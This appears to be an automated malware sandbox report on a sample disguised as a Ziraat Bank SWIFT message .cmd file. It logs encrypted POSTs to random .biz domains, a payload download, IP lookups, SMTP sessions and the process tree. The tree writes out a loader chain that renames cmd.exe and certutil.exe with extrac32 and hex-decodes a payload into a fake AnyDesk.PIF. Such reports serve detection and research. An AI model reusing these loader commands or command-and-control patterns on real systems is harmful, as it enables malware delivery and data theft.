Nov 18, 2024 09:58:57.257771969 CET  842                OUT        Data Raw: 92 95 34 52 37 3b c5 57 3e 03 00 00 99 29 3b e1 7d 87 40 86 76 6c 89 00 35 a4 f6 67 ef 3d 4e c9 81 82 39 bb 40 6a 3c 71 e8 92 b7 41 3f aa e2 4c f5 fa 7b 02 d7 5e 9d b4 88 2d a3 06 77 2e ee c8 62 ef 66 00 f7 b1 21 93 f2 55 cd 1d b6 b0 e8 59 9b 16
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 4R7;W>);}@vl5g=N9@j<qA?L{^-w.bf!UYOS5)TmF(!YdSBL`:Vr0av%|!P}?VcmGn~zV?m9O\>m\o1@e,y~NhQdbaZP
Nov 18, 2024 09:58:58.229454994 CET  413                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=667924e0e1de1fb32c9d114c89a69d15|155.94.241.187|1731920338|1731920338|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
145         192.168.2.7  50124        18.246.231.120  80                5368  C:\Windows\System32\alg.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 18, 2024 09:58:58.201603889 CET  342                OUT        POST /j HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: pectx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:58.201630116 CET  778                OUT        Data Raw: 45 83 09 e6 71 18 3c b8 fe 02 00 00 9f c2 25 ba fd 6e b3 98 5a 89 6a 4b a0 4a f4 35 46 d3 eb 63 ba e4 0b 33 eb eb f8 7c 2a 4b 1f a1 90 44 9d 95 e3 52 ed 71 04 8b 33 77 66 f0 1d 8d 0b 95 ee b6 cd b1 36 0f 74 7a c8 90 3b 48 13 88 3f 97 d2 19 6e 5f
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: Eq<%nZjKJ5Fc3|*KDRq3wf6tz;H?n_SPSxj)VVphG7\PvC/F++^V7K#acQgUX|lw^jc4WUs[NdO~B}o)h#v
Nov 18, 2024 09:58:59.032234907 CET  413                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=ec3fbd63de7dfa8e768204bdf1e2f18c|155.94.241.187|1731920338|1731920338|0|1|0; path=/; domain=.pectx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port
146         192.168.2.7  50125        18.141.10.107   80
Timestamp                            Bytes transferred  Direction  Data
Nov 18, 2024 09:58:58.247466087 CET  348                OUT        POST /sced HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:58.247487068 CET  842                OUT        Data Raw: 54 8b 20 a4 85 05 c8 ac 3e 03 00 00 44 c8 36 5f db 68 94 14 ed d6 73 59 f4 05 67 c6 a3 2f d6 36 f3 3a 8f 61 9a cf ea 59 10 03 d3 2b 7e 1f cf ca e1 63 4d ff 50 43 f1 9d 8b df 31 63 a2 21 2d 56 c4 d5 23 e7 e9 3b 58 a9 57 7f 34 39 c5 83 75 18 8e 3b
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: T >D6_hsYg/6:aY+~cMPC1c!-V#;XW49u;V+_gk(HNOt( aOb$}|_Q?PK(rwggbgXgi5D5^A_P&{aB+0d.\=H0"h]Xsv0qy<Bcc?XC2
Nov 18, 2024 09:58:59.713448048 CET  416                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=69f7a95a37218adf3ecfa7f8aea44dd4|155.94.241.187|1731920339|1731920339|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
147 | 192.168.2.7 | 50126 | 18.208.156.248 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:59.061762094 CET | 354 | OUT | POST /vbyllgxghq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: zyiexezl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:59.061805964 CET | 778 | OUT | Data Raw: 09 aa fa a3 4e 08 99 dc fe 02 00 00 e7 2d 7c f9 c4 93 e0 5c f6 a9 c2 df f3 10 a7 9f f9 be 69 c6 38 3d 9a 2b 1a 4e 09 52 dc 98 51 ed 0f 97 41 7f 76 26 ff e7 e3 b4 12 27 c4 c0 e9 67 e5 94 f4 f8 b2 f4 ee 89 d6 b7 47 2e 2f 4c 58 9f 04 9a 45 34 21 72
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: N-|\i8=+NRQAv&'gG./LXE4!ry}t32{%z>s?iHV:6M>Nq.]TU6"Pa)FrAO*s-'z[o'lDn/N+yLAu2%Xrjs.
Nov 18, 2024 09:58:59.728986979 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=58aa338a9e63911c0f101692633ff130|155.94.241.187|1731920339|1731920339|0|1|0; path=/; domain=.zyiexezl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
148 | 192.168.2.7 | 50127 | 18.208.156.248 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:59.732599020 CET | 353 | OUT | POST /cbqsfkmui HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: zyiexezl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:59.732609987 CET | 778 | OUT | Data Raw: 18 6d 85 aa df 82 47 98 fe 02 00 00 86 f7 6e 8e 6d c1 c3 77 d0 8f 90 a7 c1 21 c7 6e e4 2e e7 b6 be 8e 37 e5 01 62 f1 df 99 15 63 fc 1f 1a 09 0b 71 e6 70 96 80 bb d7 a4 00 c4 7a 13 2c 94 84 7f 28 86 fa f4 7e 80 6c f4 c4 95 14 f4 54 ab 49 78 03 69
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: mGnmw!n.7bcqpz,(~lTIxio[^::k`bP5<==,mt9ytn.WA'qZ|]r#s-dTAY(D0tyj6NS{&'K4pZMrQ
Nov 18, 2024 09:59:00.387079954 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:59:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=44e7299300497ff01437f51efcc5b978|155.94.241.187|1731920340|1731920340|0|1|0; path=/; domain=.zyiexezl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
149 | 192.168.2.7 | 50128 | 34.246.200.160 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:59.733084917 CET | 344 | OUT | POST /mu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:59.733094931 CET | 842 | OUT | Data Raw: 45 b3 46 a9 1d 1f 6d 31 3e 03 00 00 7b cc 38 0a 4c 86 d1 4c e0 54 41 24 2d c4 4e 4f 93 a9 c6 fa 8d f4 3e d6 d5 e4 f0 55 4d 6b 6e dc 0e 6c 3a 06 10 0a 35 a2 e0 03 5b ef e5 71 43 1c cc 2d 03 2b 96 02 ed 6a b5 e5 b6 08 08 2a d9 16 6b fd 01 ab 43 92
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: EFm1>{8LLTA$-NO>UMknl:5[qC-+j*kCp3'H:Ot~"iAmd[y?9U}7/+`eGMOB1Ey_Z$e{HIIooCYe*|Bd"XP2]"x%|
Nov 18, 2024 09:59:00.698491096 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
Date: Mon, 18 Nov 2024 08:59:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=de6366c074f942b992b0952990d951be|155.94.241.187|1731920340|1731920340|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49700 | 198.252.105.91 | 443 | 6588 | C:\Users\Public\Libraries\AnyDesk.PIF

Timestamp | Bytes transferred | Direction | Data
2024-11-18 08:56:13 UTC | 162 | OUT | GET /yak2/233_Juqmtmyadyy HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: gxe0.com
2024-11-18 08:56:13 UTC | 365 | IN | HTTP/1.1 200 OK
Connection: close
last-modified: Thu, 14 Nov 2024 22:46:27 GMT
accept-ranges: bytes
content-length: 3182288
date: Mon, 18 Nov 2024 08:56:13 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49892 | 104.26.13.205 | 443 | 2724 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-18 08:56:53 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-11-18 08:56:53 UTC | 399 | IN | HTTP/1.1 200 OK
Date: Mon, 18 Nov 2024 08:56:53 GMT
Content-Type: text/plain
Content-Length: 14
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                      CF-RAY: 8e46bff5cbed47a2-DFW
                                                                                                                                                                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1791&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1595592&cwnd=251&unsent_bytes=0&cid=1ca3d7f37708a4fe&ts=347&x=0"
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18 08:56:53 UTC14INData Raw: 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 155.94.241.187


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49996 | 104.26.13.205 | 443 | 1260 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-18 08:57:21 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-11-18 08:57:21 UTC | 399 | IN | HTTP/1.1 200 OK
Date: Mon, 18 Nov 2024 08:57:21 GMT
Content-Type: text/plain
Content-Length: 14
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 8e46c0a60f5b6b97-DFW
server-timing: cfL4;desc="?proto=TCP&rtt=1036&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=2724365&cwnd=251&unsent_bytes=0&cid=044496f8b9e58fa1&ts=557&x=0"
2024-11-18 08:57:21 UTC | 14 | IN | Data Raw: 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37
Data Ascii: 155.94.241.187


Session ID | Source IP | Source Port | Destination IP | Destination Port
3 | 192.168.2.7 | 50000 | 104.26.13.205 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-18 08:57:25 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-11-18 08:57:25 UTC | 399 | IN | HTTP/1.1 200 OK
Date: Mon, 18 Nov 2024 08:57:25 GMT
Content-Type: text/plain
Content-Length: 14
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 8e46c0bdaf004868-DFW
server-timing: cfL4;desc="?proto=TCP&rtt=1074&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=2337368&cwnd=251&unsent_bytes=0&cid=72ab252a2fd3d8b6&ts=201&x=0"
2024-11-18 08:57:25 UTC | 14 | IN | Data Raw: 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37
Data Ascii: 155.94.241.187


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Nov 18, 2024 09:56:58.237843037 CET | 587 | 49922 | 51.195.88.199 | 192.168.2.7 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 18 Nov 2024 08:56:58 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Nov 18, 2024 09:56:58.238058090 CET | 49922 | 587 | 192.168.2.7 | 51.195.88.199 | EHLO 124406
Nov 18, 2024 09:56:58.481767893 CET | 587 | 49922 | 51.195.88.199 | 192.168.2.7 | 250-s82.gocheapweb.com Hello 124406 [155.94.241.187]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-STARTTLS
250 HELP
Nov 18, 2024 09:56:58.481972933 CET | 49922 | 587 | 192.168.2.7 | 51.195.88.199 | STARTTLS
Nov 18, 2024 09:56:58.726116896 CET | 587 | 49922 | 51.195.88.199 | 192.168.2.7 | 220 TLS go ahead
Nov 18, 2024 09:57:03.945317984 CET | 587 | 49956 | 51.195.88.199 | 192.168.2.7 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 18 Nov 2024 08:57:03 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Nov 18, 2024 09:57:03.945445061 CET | 49956 | 587 | 192.168.2.7 | 51.195.88.199 | EHLO 124406
Nov 18, 2024 09:57:04.184408903 CET | 587 | 49956 | 51.195.88.199 | 192.168.2.7 | 250-s82.gocheapweb.com Hello 124406 [155.94.241.187]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-STARTTLS
250 HELP
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.184552908 CET49956587192.168.2.751.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.424139977 CET5874995651.195.88.199192.168.2.7220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:26.960288048 CET5875000251.195.88.199192.168.2.7220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 18 Nov 2024 08:57:26 +0000
                                                                                                                                                                                                                                                                                                                                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                                                                                                      220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:26.960536003 CET50002587192.168.2.751.195.88.199EHLO 124406
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:27.200715065 CET5875000251.195.88.199192.168.2.7250-s82.gocheapweb.com Hello 124406 [155.94.241.187]
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                                                      250 HELP
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:27.202255011 CET50002587192.168.2.751.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:27.441956997 CET5875000251.195.88.199192.168.2.7220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.724092960 CET5875000751.195.88.199192.168.2.7220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 18 Nov 2024 08:57:30 +0000
                                                                                                                                                                                                                                                                                                                                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                                                                                                      220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.724270105 CET50007587192.168.2.751.195.88.199EHLO 124406
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.963687897 CET5875000751.195.88.199192.168.2.7250-s82.gocheapweb.com Hello 124406 [155.94.241.187]
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                                                      250 HELP
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.963881969 CET50007587192.168.2.751.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.203581095 CET5875000751.195.88.199192.168.2.7220 TLS go ahead


Target ID: 0
Start time: 03:56:06
Start date: 18/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "
Imagebase: 0x7ff6bfcd0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 03:56:06
Start date: 18/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 03:56:06
Start date: 18/11/2024
Path: C:\Windows\System32\extrac32.exe
Wow64 process (32bit): false
Commandline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Imagebase: 0x7ff61c760000
File size: 35'328 bytes
MD5 hash: 41330D97BF17D07CD4308264F3032547
Has elevated privileges: true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

Target ID:4
Start time:03:56:06
Start date:18/11/2024
Path:C:\Users\Public\alpha.exe
Wow64 process (32bit):false
Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Imagebase:0x7ff7d1510000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:03:56:06
Start date:18/11/2024
Path:C:\Windows\System32\extrac32.exe
Wow64 process (32bit):false
Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Imagebase:0x7ff61c760000
File size:35'328 bytes
MD5 hash:41330D97BF17D07CD4308264F3032547
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:8
Start time:03:56:07
Start date:18/11/2024
Path:C:\Users\Public\alpha.exe
Wow64 process (32bit):false
Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
Imagebase:0x7ff7d1510000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:03:56:07
Start date:18/11/2024
Path:C:\Users\Public\kn.exe
Wow64 process (32bit):false
Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
Imagebase:0x7ff7f1340000
File size:1'651'712 bytes
MD5 hash:F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:13
Start time:03:56:08
Start date:18/11/2024
Path:C:\Users\Public\alpha.exe
Wow64 process (32bit):false
Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
Imagebase:0x7ff7d1510000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

Target ID:14
Start time:03:56:08
Start date:18/11/2024
Path:C:\Users\Public\kn.exe
Wow64 process (32bit):false
Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
Imagebase:0x7ff7f1340000
File size:1'651'712 bytes
MD5 hash:F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:15
